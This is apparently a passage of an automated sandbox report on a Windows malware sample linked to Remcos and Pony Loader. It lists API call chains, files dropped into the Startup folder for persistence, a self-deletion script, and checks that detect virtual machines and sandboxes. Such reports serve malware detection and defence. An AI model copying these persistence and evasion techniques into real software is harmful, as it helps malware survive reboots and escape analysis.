??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D342
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\SGS.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the startup folder
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to dropped file
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe\:Zone.Identifier:$DATAJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004109EF OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004109EF

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile dump: 5234062.bat.5.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeFile dump: 5249171.bat.12.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00409008 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,11_2_00409008
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Contains functionality to detect virtual machines (IN, VMware)
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00401102 in eax, dx11_2_00401102
                    Opens the same file many times (likely Sandbox evasion)
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\remcos\logs.dat count: 31458Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\remcos\logs.dat count: 30860Jump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: file.exe, file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: file.exe, 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: TSBIEDLL.DLL
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: OpenSCManagerA,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,EnumServicesStatusW,EnumServicesStatusW,GetLastError,malloc,EnumServicesStatusW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,OpenServiceW,QueryServiceConfigW,GetLastError,malloc,QueryServiceConfigW,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,CloseServiceHandle,free,CloseServiceHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004106B8
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 519Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 910Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 7754Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: foregroundWindowGot 1760Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeEvaded block: after key decisiongraph_11-5127
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeAPI coverage: 2.1 %
                    Source: C:\Users\user\Desktop\file.exe TID: 1476Thread sleep time: -5190000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 6416Thread sleep time: -455000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exe TID: 6416Thread sleep time: -3877000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004044C3 GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 004044E8h11_2_004044C3
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004044C3 GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 004044E8h11_2_004044C3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,5_2_004051E3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_004041A6
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00404E73
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408AE5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00409832
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00406920 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_00406920
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004065DB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004031ED ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004031ED
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D9F4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D9F4
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403AC1 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q11_2_00403AC1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403F4D ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@